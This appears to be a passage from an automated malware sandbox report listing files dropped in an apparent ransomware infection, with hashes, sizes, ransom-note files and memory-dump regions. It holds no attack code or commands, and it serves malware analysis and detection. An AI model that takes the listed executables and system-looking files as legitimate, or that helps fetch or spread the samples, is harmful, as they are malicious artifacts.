c62cb66498344fc2374c0924d813711ff6fa00caea8581ae104c3c03b9233455

SHA512
12d58063ccad16b01aaa5efb82a26c44c0bf58e75d497258da5cc390dcf03c2f06481b7621610305f9f350729ac4351ef432683c0f366cb3b4e24d2ffb6fc2a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp2B43.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qh2tiw2v.the.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1KK2H.tmp\ska2pwej.aeh.tmp

Filesize
2.5MB

MD5
62e5dbc52010c304c82ada0ac564eff9

SHA1
d911cb02fdaf79e7c35b863699d21ee7a0514116

SHA256
bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

SHA512
b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB1A7.tmp

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB1F8.tmp

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\u5do.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Local\Tempspwak.exe

Filesize
30KB

MD5
d459ac27cda1076af5b93ba8a573b992

SHA1
429406da9817debfbadd91dc7aecb9a682d8d9da

SHA256
c458b39ee9dacfece49933e4ceaaeab376448d8d56eb503ea519a8df8323bccb

SHA512
3f4569a5a21564b6c54df889f58022c88c6c71d415ad9f9203ead1ed518a8886d2c31a0cd7980fa47874dc5ad12c4e2b9c6946d8d643f06583c2f4c77c20500a

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\@[email protected]

Filesize
1KB

MD5
ea9ddb32a9af1a3d9315f741b1730e2d

SHA1
43b4320f6dd4ea510e85eecc96bcce610a1e1c68

SHA256
cc698424373ada2a1538bf19a04b256bdb777ccc38cd956818cdfef532fbe1d6

SHA512
5a1f33bf258e2212fe8cd609dd978ac6158a13bd96d53114a15a6f81842907f242fd5e65909cdb39ee77b989e47522a61b1396b33ecd8a7cbf4d022cda71c4da

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_F32F519B3A384BB195E50C31CE70FB74.dat

Filesize
940B

MD5
8a545603e4339a2c3b3fdad2e8557b1b

SHA1
c6561a3154d887128587e3ced1764f2565853888

SHA256
43f8852cd68018a8fa94bbc63365c5a723f045b4592aa898cc1047d927bd763a

SHA512
7273fdb231fd62c25852f8699082ce77620f692e1ab0a044f6ee7922e82c5033a48992af72986fcb01453852b4fdc71b59ddc17ac41ed63f3b7c662410870098

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe

Filesize
541KB

MD5
1fc4b9014855e9238a361046cfbf6d66

SHA1
c17f18c8246026c9979ab595392a14fe65cc5e9f

SHA256
f38c27ecbeed9721f0885d3b2f2f767d60a5d1c0a5c98433357f570987da3e50

SHA512
2af234cac24ec4a508693d9affa7f759d4b29bb3c9ddffd9e6350959fd4da26501553399d2b02a8eeae8dace6bfe9b2ce50462ce3c6547497f5b0ea6ed226b12

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe

Filesize
304KB

MD5
cc90e3326d7b20a33f8037b9aab238e4

SHA1
236d173a6ac462d85de4e866439634db3b9eeba3

SHA256
bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

SHA512
b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

Download Submit
C:\Users\Admin\Desktop\1.exe

Filesize
89KB

MD5
69a5fc20b7864e6cf84d0383779877a5

SHA1
6c31649e2dc18a9432b19e52ce7bf2014959be88

SHA256
4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

SHA512
f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\@[email protected]

Filesize
944B

MD5
e313a66a824c6965f5f1c49e89f3feea

SHA1
37be3a6b9b04b8472b716bfd59f513d32235d87a

SHA256
20c6e51f8522ab83aa87c52eed2e8e189d8fabc7546ad2085c74e018f627212f

SHA512
0db22f09b9ae939d6a3b752842dddc6f58a77267bffc177eff57fe9be2437f1170a204a1551b77d41692124673d52e5b12be09b58a3fc49755d4ef8601cf19c6

Download Submit
C:\Windows\SysWOW64\setting.ini

Filesize
141KB

MD5
2914cc3d5ae2f8be378dd56b8cd67bc4

SHA1
b1d3d753b5ab5f727e2dd7ba20f624fccdb8d492

SHA256
da7c7b9f2e4cb0e2828ac93ff1924fb08adb8c1596327592f78e0820c98f0fc1

SHA512
6411e616ece66ad05148ae8a339e7bfac5e0a4e0c8d90e4f28301c062d92a029517381a99e04146aedf1f74ad763018ab8ec52a3f109c2cee4fdbe9970b54908

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
C:\Windows\directx.sys

Filesize
112B

MD5
e57fdf5a3a524d92447c2295bdc85b09

SHA1
aa6f45c81e9924d2b1e5d6724076dc8220f9c315

SHA256
a20d157c83e5bebc5cdbb301e27046e86dce111d6c1cf3e1fe1da27f7d9c200f

SHA512
0ea455d4afebb7fab62f3e23bde12673659c277c7c9d96bfed909d7bda0550228c7bd8c097e2d6e4e83f8787bd10e73114cfadb4e58a878aa6428c5dafeabe20

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
9cec1dec79bdc6856b01cdbdc371fc56

SHA1
9a6606a3a59278e5439c3fa847593067d0434d60

SHA256
b4b74c3d63127f5257397b56dd680c0c22439891f3218d3ac5e7e416bf15322a

SHA512
b2de26969da840c4f25091cc362375fabee15fbaa6ca04951230fe043c0d535fc96faae172cda435b3982a6203461d6306f0aa4e507c72f5cd124bcad50a44b3

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
af6ba8792b8e382ea2c24f62b7e2fdf6

SHA1
a41daf6883f6147e5cc451a6b832e127ba97d713

SHA256
282a418dc304ad1bae65e613c9a51e13f3ec0b99fb9ef2937ee4ed4d868928b9

SHA512
b9fbd042ef416292b4b8c848fa87c51f732a506935f6051fdce703738ca6967ef85d1957ec4bb46f83362bff7abff8c5169308937b5e16d43a527354136a189a

Download Submit
C:\Windows\directx.sys

Filesize
110B

MD5
131aa5828730544aee98d86b07725b04

SHA1
80fcff6dec32ff869b2b0e291cb62c5994a8fc8f

SHA256
64c3371c74e44aaaa746103cdbb6b9b6f72a3bbab7521d863e36e1a6004a6813

SHA512
78dea3ef007578b0dbff043686d0090271f33baa8dbc4629bb9a8a62207999d9bbd746b206567e1fb74b6c1d4d4fd6d7b7741686a651291618d576f52b731f31

Download Submit
C:\Windows\directx.sys

Filesize
24B

MD5
c93ff55f5c5a9e2323b2f5d677bdbee1

SHA1
3e1c36c7d34bafad15e140ce5b03734f6aa87d1d

SHA256
15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc

SHA512
8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
c1983e03401e3eea3eea6c1cbcdc5ca9

SHA1
6ed34536c1f994a763d4f8920c71680e36909d8b

SHA256
ca57449bc1b540d4e981820a703bccdfd0561f19fc3814ec8a2d2ce6d75caa85

SHA512
531c96734762a919f817a04d903581b15d5a915107563aeb3da44b63c89f31d6686b339d57fe9ddcf631e683a41b6f74b8cb35f83f36fc451cd1ffeaf5a38cb7

Download Submit
C:\Windows\directx.sys

Filesize
110B

MD5
fd07ff62f0ca5014453d30e4997f139d

SHA1
2209b75670e3697de314bd0ebd4b82f658535fe7

SHA256
81598e5bc220ada073340de4949663c5ec23b7b3862870d6f977efe2ca2d44eb

SHA512
f392c463abe5855a5c60f10116908a6f703c66349333464226e1d514b3c2738d1a86ba6ea1395da444fae8cad04fe23a94da1587bbf03d6406cf5e4d6de18b91

Download Submit
C:\Windows\directx.sys

Filesize
112B

MD5
9f7e8654b6c5c6b9e47038cad41c4b83

SHA1
c9878abe86d405caa5d78bb98690e2217c217734

SHA256
77c57d327a4995ddb2f4c71b73c08d762f403fa851fd8d8a7543e4f9c0c7fbb2

SHA512
ac0059e1f88e910a82ddb3c34dc43ae3217efbf7a8df60ff8099a7e7fe47b6d95454102ff5cd12f1710a811949c8b16a56055ab1de3bb1a12db71d3fb4c3c716

Download Submit
C:\Windows\directx.sys

Filesize
110B

MD5
ba79d0c19735177e7b7c04ad929d7ea6

SHA1
93c1711e0dd0248d85a7461554d5d9f81524ef99

SHA256
58c4d1b336a191aabb66d38d19027dcca21e143e559f60ce1739e810e78e029e

SHA512
cfa601ef9d5487c35ef7f8ac6ff7f1bce7caef03be065bf005a472a687b30d69abfd3a6faf95c624fcedfe1980d202300378fb1d0cbffc9ff3fe4d3a555c0a5c

Download Submit
C:\Windows\directx.sys

Filesize
108B

MD5
1b81c1a44d0e21f68fdfe262616b6559

SHA1
85a11b62c75498bc87b94fa250595e1b224f8869

SHA256
96a3357ee3835adec4f7b55bbe97e345001691ece59e60c2675ecc18ed140a6a

SHA512
d85ba266a79118bf8800941bba587387f0125dbf473e2bde5e7bde1409b1874d07d9b4a32e9bd26fda55f46f5be00be299409ba4bd4e0c9539443610d4abb39f

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
48e2192b8fd560820d89aa4512073953

SHA1
479b84fd28f1a08e841078afa15cbc9f004dc3a4

SHA256
3aa9140bdf4f93194eae4691935154aa9f0e207195694b13f0ed7a545adbe944

SHA512
8cb564f2917364847bc2b56e526a99623cfc7f64177a803f65b229755fad2c3e8b8f6f009b5336fe4e61c411bcaa3727e24e98ae553d88d47f0a65ca2741b7c9

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
c9578a0ac2ba3eb70f81ed58b984c056

SHA1
7141df395ef2a93e108cebdeabf6f64d5b83d419

SHA256
dcf76684f420bb75d3e8d938acfcffe71a1db7ac2fccf7dbc68d922d6cff3022

SHA512
885d72c1cac84aed1ff6ffbca4ac1d7b23371189d2561bd6307b46228b463ae565f9404802df428d65edf205a6b421e3a8570cd97cfc936c63b1284eadc9d9d8

Download Submit
C:\Windows\directx.sys

Filesize
113B

MD5
743f3efbf9b038d952a924a905788315

SHA1
5d1077ddb997221ca73722052dce60403fcbcd7f

SHA256
626ce9431cfc90bdaa83cc99592998b517747878b44f813f595228ae4e6c34cb

SHA512
9a4380154346d58135e49cd9eda63ed13bdb028cf8b75eb167080b521b5ff2c21cad5ca04efdf513e0caa4335de2edd16f38c71463eb2d844d259ab26e29336c

Download Submit
C:\Windows\directx.sys

Filesize
113B

MD5
e310e0d1482642fe4a4f85854fbd812c

SHA1
237f0e85450776e4d1f9a7c0d365ddb83c2a70ab

SHA256
11c9f98807460eb055368408b414dc5c0136bd702bcb8911fb2806f4a8adb567

SHA512
98e8fb5c448e4310dd9676d705635ecf3847985cab7b362b7f1dc5ac366d6224520ca8b92f04e7ec6dff3c245ca994c68f4803e1ec7ce4cf812e65188e121339

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
37b607dba8e3ee8529406590bac6fa99

SHA1
afc79b33f28a8d9152759065c58f874432a7ba98

SHA256
7239caf0ce065b03d6105d1b144db261702a9f538c3b5bdcffcedc46cffcd390

SHA512
cb758c1ff76c869ce67a1420399f5094208712c8fc07be80d3add6f68a7f33646599607db8639f5d2b95503c03dae2a6364b8a3dc764d42a6fbe63c30da05b45

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
40ade52684c6162b16bdd2a456b5595c

SHA1
96eaa512c9a0daf9a24c630ad8090bf2673f8f60

SHA256
6df46519d2c950782c01a68d82b72cb6738797115954a2f4179c6635379492f5

SHA512
74cbd9ccecba6fff3037d2e86a4ef9de55b4c6fa210a103ed44f217bd92fd432c6808eb36821e15dff9deef12111b1e2f6f0552978e0db8ea7fbd70fd373e2e5

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
4f18001b411f27e552042e5712115ec3

SHA1
12815534814cddb05f35f1fdfb39ce3fd31f2f72

SHA256
d915fb755b2d6c1a874d8cdefe76da46a61acb2efda52759e8cad6bb36a98de1

SHA512
7a9228b055501a624904fdba2dd682392b98a0fa686f322aae0ccbb51d93b003a57b631e8cc0535596d7a9b4b6d0ef56d3cd87148663d69c4d72bf986fc7bc2a

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
2079438d97a40d8db133069f78c92fc0

SHA1
d0ff464c4adc6a90c5dc4bfbe6dcee23ecea7fa2

SHA256
2795ab668ee290a7250d8cc529916b3e2f11bade24f197533c889d50daaf6ad8

SHA512
4a794412431d51e2d7fbe403b8eeecf80f20ec118c23a9a4d66347a905f8f792d1e9ee7fd0ad2bac6e97b6486f9c5b75a4dcae51c62d51dd1200cc1503c2adc2

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
5cd51d971cd0624d9c8124cb58eee226

SHA1
8b5c14b0c00f04027d118f0863325a6256b82832

SHA256
80f3cf4bc6c7f1aa66adf818ec2cca0c5141c2b596009c10da0973bd0c4063e1

SHA512
96926e378dfb2c70ebbdfbfa349f071bea5596f91cd0aca017f9a706866645d6d550b875a430e39908362157e842b7bb085d65d30e09712dd027598992292b09

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
f48dc94066c388260e3450b2c8c4df04

SHA1
a7b6e0b24d7d3dbae0b0aed7dc794a6630ba4bad

SHA256
13ecdeed134b8807966c88b10bf6a6a2caea28e2811eb52d76ae0e95669999c9

SHA512
c1f0344ee702f298fa5790fd40a5d7dc6a3256c70a114e359eb3ae26edafc6626bb9c03d4dff6621edd2684d75afd0a999cb62822f5af39a70dbba7bef2a0390

Download Submit
C:\Windows\directx.sys

Filesize
58B

MD5
d464ee49f696cebef9c3ee575cd9537f

SHA1
6290ec1047c65beeab43dfcabeaf8f9c94c46c0f

SHA256
1f8a21907ce4244a06b215814c21c705a9d17ffe206af2f99184551d9c542a45

SHA512
bd3e7e9bee128a6dc51b84953b49f91ac8ee8daabfca6e69ad4d06fc5050b86970dd9a185998741915e81a3029d5dc155fd095d8701279733121f6e38ebc4953

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
b6898b7e48b333c52adcc157cc9e11b2

SHA1
16fe64b46932265f5965647fccce0460c9cff93b

SHA256
664690efcc347d527ddb8fcbdde8a6ff74b41426bf136c99ae7a9dbf650e8f12

SHA512
082e20b620f9b741d5301a4134d131658bd3f0cbbe929697b164b56aba44908584e6bdcc85a0b9aa4a8536ab4d1f0c924100188dbadee3c4e3ef334741a59f0f

Download Submit
C:\Windows\directx.sys

Filesize
56B

MD5
2e9d0bb9ed9a6174ca8a0bb85e04e6d7

SHA1
e89fbd37daff1decb5b547cc17167eaf749b856a

SHA256
6233319c90a0f17e04c0513529068f55fda319df816b00f7213658189fd87f68

SHA512
c338d4a7f0ba214ef7320c1c2485030158e7fe5ac5f0ea5f7870b6c5164023b387014ae223c69bb765690e3a67cccac62dd66378ca03123189f63983e7674a66

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
277eb81a9719e381e0b386ea405eb02d

SHA1
8cb139329ec7562a47784657cd70a0600cb0bc5b

SHA256
a605a56216c9d1bae2f37c51b2b0956fcaa94401b99c68f9fa4836827fc4f7e8

SHA512
2e1c0300a31d35cf13e31d8b8d1d4bab6f9cc18ef03785aa9f4da21af60744e81ff6e23d02e129e128c00cc71b971bf84f5487ac887b1ee82e58d523bc9498cf

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
dba74fee8307158a83a3eaebba3429dd

SHA1
3a85d9619bfffc51afb55fa4174b2723cc8e3db1

SHA256
51c47ed10ee6695bc0ba139171ee6c6b5f8188bb604c82ac0522660f6feada4e

SHA512
29052b29a250cc62ad30cbb762537bdc5fc20a4cc820bd1b4913f2e56b54457bccacd6eaae835fb134e82744a38bbc0389fb1852b091c7e1bdac8614ef9195e5

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
f2a8bce272092321ba696e7333bdc9db

SHA1
6e947c9f8c0f56b0596df73dc864b8489c75a23a

SHA256
004ee3602e282f71d2c8aa20f8ec3bed18ec273a3ce02f6613811b179f808b2b

SHA512
ad7f51b84c2c9dceffa5ece370d0e0cab342139760439284c02564183dbde63fd4c50649891fa383dea5706d6477d9b5bd27d9e47ef22fff15150293149f8eaf

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
e17488ee6345d8ec3d49d7bcb6e40ed3

SHA1
d3c57cbe4d8a7428bf0174e673c754fcadb1f0cc

SHA256
8a3346cf0c7c99b57d6b3a7e02ed189ee6d2b65ac26f0aa7079c8258de62e725

SHA512
51cb3c2e07c4a73807cd69286aa14b2e4c802dcd5164e27e37a7680166007ec4dad8cf405335df8d1001578b5da4c36c24ffaf552bae8281f342fb9eb4f20429

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
1a72b75486de9dbc7199f3db978e8e1e

SHA1
5dc1553d9e7a23926ba5498fadbb8810c033eb83

SHA256
78e8a2cffd89577ccbc4c8a8370b7b44dcafbc266301b11b30443314752c9a80

SHA512
82252500af20bd473207fe3b534c26496eb5b5ceeb462c6ad6ecef061ee8e34c5eb0639b868069c5f43d6e769c3e23ba35ed50b6fd20017427634a574add57a3

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
145ac2243ed843163859c68b79463cda

SHA1
f33b9e885084db6c229c8ef59d319be575a31244

SHA256
0a3279a8ec161765e97841a033402e5b1cb10e74a9e1a79c7c4dd8278f69f454

SHA512
87d6f7d96ee3f8f7359002480b3b6af9fd4baca9b7cd4abd4ae63768cfacbade96654354d630b0e45687c7753b9e56c220e857b3becf227183155ba2fb5bbfd8

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
124f013c266fb9e669766ec4c38d1bb0

SHA1
d6ec49ba1ef1b1cad0bd54600444863c830ef009

SHA256
f1f296fdafce4e419c57f8ea2ee61cdb6050886cdbaccb1aad81b62acaa8e642

SHA512
a644210386797b55a1682b42cd554d7e391868a1c5c8eeb906d54a620131d1af3b8fc24ce88fbf5c6a1c43a34614f1338ce672bd8678770d756917c5e8601c8a

Download Submit
C:\Windows\directx.sys

Filesize
29B

MD5
e48dd15c2622de57f9d96167526aa29b

SHA1
227e44c82be64d3b54a0d237018a874ea16c6982

SHA256
b84d90ce79f74578bf032d5481e92435bb92dc5da421f090dacf3184478d0e60

SHA512
371d73f5ebbb28aa7ff462905c6176f35c817dc18bed35d06b6e68022c6887b871fcf655fd0190523ebf3a16818c8df3bb6479fb27aef2175fa0894105ec0aa0

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
93ce69a38af876f1bc46efd172ad4974

SHA1
537d13e59d7bb7458fc0912ee8de85926a061d08

SHA256
cfbae21c20e214534d07a2629f07c6f40390322c11bfcc350b866a3936b5136d

SHA512
132372e8ca53dd80f5cca7c0447cd7c033c9cefdd6d00bd47faf544ea20b98bcb61c738e549d8c70e7fbfe99b7b04b77cb3b30d401c38ea2058a5e7fc61b8140

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
e4d0bef03ccfac7bccee047d29ea93b1

SHA1
78a35d1b209cc7e3dcd96479f3906c599e8d45ad

SHA256
b1c42b81946e66eb7b28661311dc6fb6d664869372e279c3f62307e4df7aba57

SHA512
2895141ceb1d17de76a4f3991009fd127dd44b6fc80f25d3f5c8da0b7a87538aff9d655ec5933703f893e7970dc6fe2568e22a7e0614851fbd19ce1c5f74ef0e

Download Submit
C:\Windows\directx.sys

Filesize
43B

MD5
e08da1f05efb3b6d438640a92d92761c

SHA1
cd8f9ad002181ebf87a3625734498ddc4a50ec59

SHA256
b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52

SHA512
e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d

Download Submit
C:\Windows\directx.sys

Filesize
86B

MD5
f885d87964363b63dd02fa0764914e34

SHA1
f4040260ce0513af83c51129835e39fc1dc5b8cd

SHA256
6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f

SHA512
054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
99e8c868a77c69cc6ce54ce05f5b8584

SHA1
66888e238bea5113bf0db98148a2fc74636c4f06

SHA256
7c6fc7307954c3a226d540ee17bcc3aeb3057c25608b609c59ce30bde857b03f

SHA512
ec5e0014ef563d0fe06b6e7bb1f2a5e98bc41f61ff3573877b82512af11838d78f7ba7c12c754a22bb2f94eab3cdd1d469d42c4ba44b97a080feab5917c29643

Download Submit
C:\Windows\directx.sys

Filesize
76B

MD5
033a21d049cf5546fe0537f15435c440

SHA1
2da12b487030fb6300e992b474860444229dfad6

SHA256
bdb8157f9c7d593b90df878e8010f87c3d3f18108e43d2e50415b36c5536f3d1

SHA512
0a60df9963d3b5adb25347d1270163d7257dd0823a4435a7a07a3a0dfdeeef6e9b06d1101f672453b5cdc63bdbc18d4fd43e813fc6220a5c764a276190bcc224

Download Submit
C:\odt\DECRYPT-FILES.txt

Filesize
10KB

MD5
eb2f4e9a5c3b5647c222d5a51cf8645a

SHA1
67e5ce5a7b6d622575500c08198b7ec40616f606

SHA256
3955138c9b60f71b3607d7602a2f3d604be069b87ab094ae016c8ae388bccaa3

SHA512
4c2be6b0d80092ed7aa1f527ca6730e21fd1d8d99fac2dadf19daf54596565af65b71414a54483d03c1afac5dd6fe5da9d5b1a426d58e767ac8a1e559e764095

Download Submit
C:\odt\OFFICE~1.EXE

Filesize
5.1MB

MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-3852399462-405385529-394778097-1000\DECRYPT-FILES.txt

Filesize
10KB

MD5
bb98890c885ddc9e1959fbea1d0bb19b

SHA1
2cead99c21cce18402fe69686e95f620c8527966

SHA256
f64c67b06ebf92bd1046d710502bde37ffe1d717b3f4b2359ae1e54fa907f340

SHA512
91c8ca0c4b9df482d3e5ef5acfe245aedecf8c340d3dc579c95f548d13a3bcc8d67efe5cc33819331c065ba488f26e76615c632f2f98e3a2d0cc7beaa87e562e

Download Submit
F:\@[email protected]

Filesize
240KB

MD5
de43ec4cd15ab9909779a0bc0fccb14e

SHA1
71537ce158e6a6e35fb5ea7861d06c25b121e97f

SHA256
5a47d0b8ef9283588d66446427dd868816fb05eea76aa9fbea23381313efd87c

SHA512
15f11d737bde79ec3d9f7af263a383b14a6120fea8f5ec0d9aa47cf6a72924d0a6c093fd53d20c492c8f94f7fdb40f36d9451c63fe0a4ca8601a0a10992370f7

Download Submit
memory/104-128-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

Filesize
32KB

Download
memory/104-665-0x0000000005630000-0x0000000005640000-memory.dmp

Filesize
64KB

Download
memory/104-267-0x0000000005630000-0x0000000005640000-memory.dmp

Filesize
64KB

Download
memory/104-107-0x0000000072BA0000-0x0000000073351000-memory.dmp

Filesize
7.7MB

Download
memory/104-107-0x0000000072BA0000-0x0000000073351000-memory.dmp

Filesize
7.7MB

Download
memory/104-245-0x0000000072BA0000-0x0000000073351000-memory.dmp

Filesize
7.7MB

Download
memory/104-245-0x0000000072BA0000-0x0000000073351000-memory.dmp

Filesize
7.7MB

Download
memory/104-224-0x00000000053F0000-0x000000000548C000-memory.dmp

Filesize
624KB

Download
memory/104-665-0x0000000005630000-0x0000000005640000-memory.dmp

Filesize
64KB

Download
memory/104-267-0x0000000005630000-0x0000000005640000-memory.dmp

Filesize
64KB

Download
memory/104-128-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

Filesize
32KB

Download
memory/104-224-0x00000000053F0000-0x000000000548C000-memory.dmp

Filesize
624KB

Download
memory/320-818-0x00007FFED14A0000-0x00007FFED1F62000-memory.dmp

Filesize
10.8MB

Download
memory/320-812-0x00000000016F0000-0x0000000001700000-memory.dmp

Filesize
64KB

Download
memory/320-812-0x00000000016F0000-0x0000000001700000-memory.dmp

Filesize
64KB

Download
memory/320-818-0x00007FFED14A0000-0x00007FFED1F62000-memory.dmp

Filesize
10.8MB

Download
memory/780-88-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/780-88-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1012-518-0x00007FFED14A0000-0x00007FFED1F62000-memory.dmp

Filesize
10.8MB

Download
memory/1012-601-0x0000000002940000-0x000000000294C000-memory.dmp

Filesize
48KB

Download
memory/1012-518-0x00007FFED14A0000-0x00007FFED1F62000-memory.dmp

Filesize
10.8MB

Download
memory/1012-520-0x0000000000790000-0x0000000000824000-memory.dmp

Filesize
592KB

Download
memory/1012-590-0x0000000002910000-0x000000000291C000-memory.dmp

Filesize
48KB

Download
memory/1012-597-0x0000000002920000-0x000000000292A000-memory.dmp

Filesize
40KB

Download
memory/1012-600-0x0000000002930000-0x000000000293C000-memory.dmp

Filesize
48KB

Download
memory/1012-600-0x0000000002930000-0x000000000293C000-memory.dmp

Filesize
48KB

Download
memory/1012-597-0x0000000002920000-0x000000000292A000-memory.dmp

Filesize
40KB

Download
memory/1012-601-0x0000000002940000-0x000000000294C000-memory.dmp

Filesize
48KB

Download
memory/1012-590-0x0000000002910000-0x000000000291C000-memory.dmp

Filesize
48KB

Download
memory/1012-520-0x0000000000790000-0x0000000000824000-memory.dmp

Filesize
592KB

Download
memory/1292-824-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1292-824-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1508-285-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-393-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-285-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-125-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-125-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-393-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-354-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1508-354-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1612-506-0x00007FFEFAB60000-0x00007FFEFAD69000-memory.dmp

Filesize
2.0MB

Download
memory/1612-506-0x00007FFEFAB60000-0x00007FFEFAD69000-memory.dmp

Filesize
2.0MB

Download
memory/1664-337-0x0000000000400000-0x00000000005DE000-memory.dmp

